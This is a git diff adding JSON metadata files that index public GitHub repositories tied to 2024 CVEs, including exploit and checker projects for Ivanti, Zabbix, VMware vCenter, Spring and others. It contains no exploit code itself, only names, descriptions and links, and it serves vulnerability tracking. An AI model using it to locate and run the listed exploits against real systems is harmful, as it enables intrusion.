"is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21793.json b/2024/CVE-2024-21793.json new file mode 100644 index 0000000000..4376c0288d --- /dev/null +++ b/2024/CVE-2024-21793.json @@ -0,0 +1,33 @@ +[ + { + "id": 798058447, + "name": "CVE-2024-21793", + "full_name": "FeatherStark\/CVE-2024-21793", + "owner": { + "login": "FeatherStark", + "id": 42148584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42148584?v=4", + "html_url": "https:\/\/github.com\/FeatherStark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FeatherStark\/CVE-2024-21793", + "description": null, + "fork": false, + "created_at": "2024-05-09T02:31:13Z", + "updated_at": "2024-05-09T02:32:23Z", + "pushed_at": "2024-05-09T02:32:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2188.json b/2024/CVE-2024-2188.json new file mode 100644 index 0000000000..13471c566b --- /dev/null +++ b/2024/CVE-2024-2188.json @@ -0,0 +1,33 @@ +[ + { + "id": 858787838, + "name": "CVE-2024-2188", + "full_name": "hacefresko\/CVE-2024-2188", + "owner": { + "login": "hacefresko", + "id": 47251535, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47251535?v=4", + "html_url": "https:\/\/github.com\/hacefresko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hacefresko\/CVE-2024-2188", + "description": "Exploit for stored XSS vulnerability found in the TP-Link Archer AX50 router.", + "fork": false, + "created_at": "2024-09-17T14:33:13Z", + "updated_at": "2024-11-20T16:31:05Z", + "pushed_at": "2024-10-31T18:53:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21887.json b/2024/CVE-2024-21887.json new file mode 100644 index 0000000000..6d5f529230 --- /dev/null +++ b/2024/CVE-2024-21887.json @@ -0,0 +1,219 @@ +[ + { + "id": 743084274, + "name": "ivanti-CVE-2024-21887", + "full_name": "oways\/ivanti-CVE-2024-21887", + "owner": { + "login": "oways", + "id": 11142952, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11142952?v=4", + "html_url": "https:\/\/github.com\/oways", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oways\/ivanti-CVE-2024-21887", + "description": "POC Checker for ivanti CVE-2024-21887 Command injcetion", + "fork": false, + "created_at": "2024-01-14T09:25:56Z", + "updated_at": "2024-05-10T02:50:53Z", + "pushed_at": "2024-01-14T09:27:36Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 744186376, + "name": "CVE-2023-46805_CVE-2024-21887", + "full_name": "duy-31\/CVE-2023-46805_CVE-2024-21887", + "owner": { + "login": "duy-31", + "id": 20819326, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20819326?v=4", + "html_url": "https:\/\/github.com\/duy-31", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duy-31\/CVE-2023-46805_CVE-2024-21887", + "description": "An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.", + "fork": false, + "created_at": "2024-01-16T19:40:59Z", + "updated_at": "2024-12-14T13:55:04Z", + "pushed_at": "2024-01-17T19:14:09Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 20, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 744213825, + "name": "CVE-2024-21887", + "full_name": "Chocapikk\/CVE-2024-21887", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-21887", + "description": "A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.", + "fork": false, + "created_at": "2024-01-16T20:59:38Z", + "updated_at": "2025-01-05T04:54:19Z", + "pushed_at": "2024-01-17T00:38:28Z", + "stargazers_count": 53, + "watchers_count": 53, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 53, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 745015590, + "name": "CVE-2023-46805_CVE-2024-21887", + "full_name": "raminkarimkhani1996\/CVE-2023-46805_CVE-2024-21887", + "owner": { + "login": "raminkarimkhani1996", + "id": 26582031, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26582031?v=4", + "html_url": "https:\/\/github.com\/raminkarimkhani1996", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raminkarimkhani1996\/CVE-2023-46805_CVE-2024-21887", + "description": "The script in this repository only checks whether the vulnerabilities specified in the Ivanti Connect Secure product exist.", + "fork": false, + "created_at": "2024-01-18T13:25:46Z", + "updated_at": "2024-12-31T18:42:04Z", + "pushed_at": "2024-03-23T14:52:22Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745284788, + "name": "Ivanti-Connect-Around-Scan", + "full_name": "seajaysec\/Ivanti-Connect-Around-Scan", + "owner": { + "login": "seajaysec", + "id": 7016191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7016191?v=4", + "html_url": "https:\/\/github.com\/seajaysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seajaysec\/Ivanti-Connect-Around-Scan", + "description": "Mitigation validation utility for the Ivanti Connect Around attack chain. Runs multiple checks. CVE-2023-46805, CVE-2024-21887.", + "fork": false, + "created_at": "2024-01-19T02:12:11Z", + "updated_at": "2024-04-05T07:44:30Z", + "pushed_at": "2024-02-03T01:59:49Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745384269, + "name": "CVE-2023-46805_CVE-2024-21887_scan_grouped", + "full_name": "mickdec\/CVE-2023-46805_CVE-2024-21887_scan_grouped", + "owner": { + "login": "mickdec", + "id": 33021266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33021266?v=4", + "html_url": "https:\/\/github.com\/mickdec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mickdec\/CVE-2023-46805_CVE-2024-21887_scan_grouped", + "description": null, + "fork": false, + "created_at": "2024-01-19T08:11:31Z", + "updated_at": "2024-05-21T12:56:29Z", + "pushed_at": "2024-05-21T12:56:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745995423, + "name": "CVE-2024-21887", + "full_name": "tucommenceapousser\/CVE-2024-21887", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2024-21887", + "description": "exploit for ivanti", + "fork": false, + "created_at": "2024-01-20T19:15:23Z", + "updated_at": "2024-07-05T09:57:14Z", + "pushed_at": "2024-01-20T19:20:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21893.json b/2024/CVE-2024-21893.json new file mode 100644 index 0000000000..f7ac0f419f --- /dev/null +++ b/2024/CVE-2024-21893.json @@ -0,0 +1,64 @@ +[ + { + "id": 752054404, + "name": "CVE-2024-21893.py", + "full_name": "h4x0r-dz\/CVE-2024-21893.py", + "owner": { + "login": "h4x0r-dz", + "id": 26070859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26070859?v=4", + "html_url": "https:\/\/github.com\/h4x0r-dz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4x0r-dz\/CVE-2024-21893.py", + "description": "CVE-2024-21893: SSRF Vulnerability in Ivanti Connect Secure", + "fork": false, + "created_at": "2024-02-02T22:59:21Z", + "updated_at": "2024-11-14T22:33:31Z", + "pushed_at": "2024-02-02T23:27:10Z", + "stargazers_count": 92, + "watchers_count": 92, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 92, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 752217325, + "name": "CVE-2024-21893-to-CVE-2024-21887", + "full_name": "Chocapikk\/CVE-2024-21893-to-CVE-2024-21887", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-21893-to-CVE-2024-21887", + "description": "CVE-2024-21893 to CVE-2024-21887 Exploit Toolkit", + "fork": false, + "created_at": "2024-02-03T11:33:40Z", + "updated_at": "2024-12-20T14:07:58Z", + "pushed_at": "2024-02-03T11:48:37Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2193.json b/2024/CVE-2024-2193.json new file mode 100644 index 0000000000..eae142cba7 --- /dev/null +++ b/2024/CVE-2024-2193.json @@ -0,0 +1,33 @@ +[ + { + "id": 778680882, + "name": "CVE-2024-2193", + "full_name": "uthrasri\/CVE-2024-2193", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2024-2193", + "description": null, + "fork": false, + "created_at": "2024-03-28T07:30:04Z", + "updated_at": "2024-03-28T07:31:14Z", + "pushed_at": "2024-03-28T07:31:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21978.json b/2024/CVE-2024-21978.json new file mode 100644 index 0000000000..3d08e2a632 --- /dev/null +++ b/2024/CVE-2024-21978.json @@ -0,0 +1,33 @@ +[ + { + "id": 740045599, + "name": "cve-2024-21978-poc", + "full_name": "Freax13\/cve-2024-21978-poc", + "owner": { + "login": "Freax13", + "id": 14952658, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14952658?v=4", + "html_url": "https:\/\/github.com\/Freax13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Freax13\/cve-2024-21978-poc", + "description": null, + "fork": false, + "created_at": "2024-01-07T11:07:01Z", + "updated_at": "2024-09-17T06:51:21Z", + "pushed_at": "2024-09-17T06:51:18Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-21980.json b/2024/CVE-2024-21980.json new file mode 100644 index 0000000000..ad0c858290 --- /dev/null +++ b/2024/CVE-2024-21980.json @@ -0,0 +1,33 @@ +[ + { + "id": 741649413, + "name": "cve-2024-21980-poc", + "full_name": "Freax13\/cve-2024-21980-poc", + "owner": { + "login": "Freax13", + "id": 14952658, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14952658?v=4", + "html_url": "https:\/\/github.com\/Freax13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Freax13\/cve-2024-21980-poc", + "description": null, + "fork": false, + "created_at": "2024-01-10T20:35:38Z", + "updated_at": "2024-09-13T17:07:18Z", + "pushed_at": "2024-01-10T20:43:07Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22002.json b/2024/CVE-2024-22002.json new file mode 100644 index 0000000000..970680f5c7 --- /dev/null +++ b/2024/CVE-2024-22002.json @@ -0,0 +1,33 @@ +[ + { + "id": 738235829, + "name": "iCUE_DllHijack_LPE-CVE-2024-22002", + "full_name": "0xkickit\/iCUE_DllHijack_LPE-CVE-2024-22002", + "owner": { + "login": "0xkickit", + "id": 141216208, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141216208?v=4", + "html_url": "https:\/\/github.com\/0xkickit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xkickit\/iCUE_DllHijack_LPE-CVE-2024-22002", + "description": null, + "fork": false, + "created_at": "2024-01-02T18:49:21Z", + "updated_at": "2024-05-23T16:22:19Z", + "pushed_at": "2024-05-23T16:18:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22024.json b/2024/CVE-2024-22024.json new file mode 100644 index 0000000000..ff02f04f73 --- /dev/null +++ b/2024/CVE-2024-22024.json @@ -0,0 +1,33 @@ +[ + { + "id": 755152479, + "name": "CVE-2024-22024", + "full_name": "0dteam\/CVE-2024-22024", + "owner": { + "login": "0dteam", + "id": 56728081, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56728081?v=4", + "html_url": "https:\/\/github.com\/0dteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0dteam\/CVE-2024-22024", + "description": "Check for CVE-2024-22024 vulnerability in Ivanti Connect Secure", + "fork": false, + "created_at": "2024-02-09T14:31:56Z", + "updated_at": "2024-06-30T21:24:49Z", + "pushed_at": "2024-02-09T15:14:03Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 29, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22026.json b/2024/CVE-2024-22026.json new file mode 100644 index 0000000000..112118be7f --- /dev/null +++ b/2024/CVE-2024-22026.json @@ -0,0 +1,33 @@ +[ + { + "id": 800980981, + "name": "CVE-2024-22026", + "full_name": "securekomodo\/CVE-2024-22026", + "owner": { + "login": "securekomodo", + "id": 4809643, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4809643?v=4", + "html_url": "https:\/\/github.com\/securekomodo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securekomodo\/CVE-2024-22026", + "description": "Exploit POC for CVE-2024-22026 affecting Ivanti EPMM \"MobileIron Core\"", + "fork": false, + "created_at": "2024-05-15T11:20:45Z", + "updated_at": "2024-11-20T16:30:46Z", + "pushed_at": "2024-05-15T11:40:29Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22120.json b/2024/CVE-2024-22120.json new file mode 100644 index 0000000000..d441ae282e --- /dev/null +++ b/2024/CVE-2024-22120.json @@ -0,0 +1,99 @@ +[ + { + "id": 803086886, + "name": "CVE-2024-22120-RCE", + "full_name": "W01fh4cker\/CVE-2024-22120-RCE", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2024-22120-RCE", + "description": "Time Based SQL Injection in Zabbix Server Audit Log --> RCE", + "fork": false, + "created_at": "2024-05-20T03:29:09Z", + "updated_at": "2024-10-29T13:04:39Z", + "pushed_at": "2024-05-21T10:30:49Z", + "stargazers_count": 114, + "watchers_count": 114, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-22120", + "redteam", + "zabbix" + ], + "visibility": "public", + "forks": 22, + "watchers": 114, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 842041393, + "name": "CVE-2024-22120-RCE-with-gopher", + "full_name": "isPique\/CVE-2024-22120-RCE-with-gopher", + "owner": { + "login": "isPique", + "id": 139041426, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139041426?v=4", + "html_url": "https:\/\/github.com\/isPique", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/isPique\/CVE-2024-22120-RCE-with-gopher", + "description": "This is my exploit for CVE-2024-22120, which involves an SSRF vulnerability inside an XXE with a Gopher payload.", + "fork": false, + "created_at": "2024-08-13T14:51:44Z", + "updated_at": "2024-11-18T20:54:20Z", + "pushed_at": "2024-08-13T14:56:42Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 842565397, + "name": "CVE-2024-22120-RCE-with-gopher", + "full_name": "g4nkd\/CVE-2024-22120-RCE-with-gopher", + "owner": { + "login": "g4nkd", + "id": 150204934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150204934?v=4", + "html_url": "https:\/\/github.com\/g4nkd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g4nkd\/CVE-2024-22120-RCE-with-gopher", + "description": "This exploit was created to exploit an XXE (XML External Entity). Through it, I read the backend code of the web service and found an endpoint where I could use gopher to make internal requests on Zabbix vulnerable to RCE.", + "fork": false, + "created_at": "2024-08-14T15:55:33Z", + "updated_at": "2024-08-24T08:17:46Z", + "pushed_at": "2024-08-15T09:55:53Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22145.json b/2024/CVE-2024-22145.json new file mode 100644 index 0000000000..57c9193d02 --- /dev/null +++ b/2024/CVE-2024-22145.json @@ -0,0 +1,38 @@ +[ + { + "id": 744705693, + "name": "CVE-2024-22145", + "full_name": "RandomRobbieBF\/CVE-2024-22145", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-22145", + "description": "InstaWP Connect <= 0.1.0.8 - Missing Authorization to Arbitrary Options Update (Subscriber+)", + "fork": false, + "created_at": "2024-01-17T20:56:21Z", + "updated_at": "2024-07-11T16:39:44Z", + "pushed_at": "2024-01-17T20:59:47Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-22145", + "exploit", + "instawp-connect", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22198.json b/2024/CVE-2024-22198.json new file mode 100644 index 0000000000..a62b1970f5 --- /dev/null +++ b/2024/CVE-2024-22198.json @@ -0,0 +1,36 @@ +[ + { + "id": 833176749, + "name": "CVE-2024-22198_Checker", + "full_name": "xiw1ll\/CVE-2024-22198_Checker", + "owner": { + "login": "xiw1ll", + "id": 69167284, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69167284?v=4", + "html_url": "https:\/\/github.com\/xiw1ll", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiw1ll\/CVE-2024-22198_Checker", + "description": "Identify Nginx-ui version and check if it's vulnerable to CVE-2024-22198", + "fork": false, + "created_at": "2024-07-24T13:59:51Z", + "updated_at": "2024-08-05T08:46:39Z", + "pushed_at": "2024-07-24T14:02:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "checker", + "cve-2024-22198" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22243.json b/2024/CVE-2024-22243.json new file mode 100644 index 0000000000..2cfb821e5a --- /dev/null +++ b/2024/CVE-2024-22243.json @@ -0,0 +1,76 @@ +[ + { + "id": 761209664, + "name": "CVE-2024-22243", + "full_name": "SeanPesce\/CVE-2024-22243", + "owner": { + "login": "SeanPesce", + "id": 20076909, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20076909?v=4", + "html_url": "https:\/\/github.com\/SeanPesce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SeanPesce\/CVE-2024-22243", + "description": "Example exploitable scenarios for CVE-2024-22243 affecting the Spring framework (open redirect & SSRF).", + "fork": false, + "created_at": "2024-02-21T12:55:22Z", + "updated_at": "2024-11-29T12:54:38Z", + "pushed_at": "2024-10-22T16:37:42Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ctf", + "cve-2024-22243", + "java", + "open-redirect", + "server-side-request-forgery", + "spring", + "ssrf", + "uri", + "url", + "vulnerability", + "web" + ], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 762214516, + "name": "CVE-2024-22243-CVE-2024-22234", + "full_name": "shellfeel\/CVE-2024-22243-CVE-2024-22234", + "owner": { + "login": "shellfeel", + "id": 18633010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18633010?v=4", + "html_url": "https:\/\/github.com\/shellfeel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shellfeel\/CVE-2024-22243-CVE-2024-22234", + "description": " env of CVE-2024-22243&CVE-2024-22234", + "fork": false, + "created_at": "2024-02-23T10:09:51Z", + "updated_at": "2024-05-16T01:31:27Z", + "pushed_at": "2024-02-28T06:55:26Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22262.json b/2024/CVE-2024-22262.json new file mode 100644 index 0000000000..c402f06e2d --- /dev/null +++ b/2024/CVE-2024-22262.json @@ -0,0 +1,33 @@ +[ + { + "id": 891146409, + "name": "CVE-2024-22262", + "full_name": "Performant-Labs\/CVE-2024-22262", + "owner": { + "login": "Performant-Labs", + "id": 35463594, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35463594?v=4", + "html_url": "https:\/\/github.com\/Performant-Labs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Performant-Labs\/CVE-2024-22262", + "description": null, + "fork": false, + "created_at": "2024-11-19T20:08:57Z", + "updated_at": "2024-11-22T17:56:59Z", + "pushed_at": "2024-11-22T17:56:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22263.json b/2024/CVE-2024-22263.json new file mode 100644 index 0000000000..bb7291b3fc --- /dev/null +++ b/2024/CVE-2024-22263.json @@ -0,0 +1,33 @@ +[ + { + "id": 845723051, + "name": "CVE-2024-22263_Scanner", + "full_name": "securelayer7\/CVE-2024-22263_Scanner", + "owner": { + "login": "securelayer7", + "id": 14994455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14994455?v=4", + "html_url": "https:\/\/github.com\/securelayer7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securelayer7\/CVE-2024-22263_Scanner", + "description": "(CVE-2024-22263) Spring Cloud Dataflow Arbitrary File Writing Scanner", + "fork": false, + "created_at": "2024-08-21T19:58:25Z", + "updated_at": "2024-10-02T05:55:18Z", + "pushed_at": "2024-08-21T20:08:25Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-22274.json b/2024/CVE-2024-22274.json new file mode 100644 index 0000000000..b7987a951a --- /dev/null +++ b/2024/CVE-2024-22274.json @@ -0,0 +1,144 @@ +[ + { + "id": 825079199, + "name": "CVE-2024-22274", + "full_name": "mbadanoiu\/CVE-2024-22274", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2024-22274", + "description": "CVE-2024-22274: Authenticated Remote Code Execution in VMware vCenter Server", + "fork": false, + "created_at": "2024-07-06T17:55:25Z", + "updated_at": "2025-01-04T19:32:26Z", + "pushed_at": "2024-07-06T18:10:20Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "cve", + "cve-2024-22274", + "cves", + "remote-code-execution" + ], + "visibility": "public", + "forks": 10, + "watchers": 37, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 827123627, + "name": "CVE-2024-22274", + "full_name": "ninhpn1337\/CVE-2024-22274", + "owner": { + "login": "ninhpn1337", + "id": 26117234, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26117234?v=4", + "html_url": "https:\/\/github.com\/ninhpn1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ninhpn1337\/CVE-2024-22274", + "description": null, + "fork": false, + "created_at": "2024-07-11T04:13:59Z", + "updated_at": "2024-07-11T04:19:52Z", + "pushed_at": "2024-07-11T04:19:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 828815621, + "name": "CVE-2024-22274-RCE", + "full_name": "l0n3m4n\/CVE-2024-22274-RCE", + "owner": { + "login": "l0n3m4n", + "id": 143868630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143868630?v=4", + "html_url": "https:\/\/github.com\/l0n3m4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l0n3m4n\/CVE-2024-22274-RCE", + "description": "PoC - Authenticated Remote Code Execution in VMware vCenter Server (Exploit)", + "fork": false, + "created_at": "2024-07-15T07:26:59Z", + "updated_at": 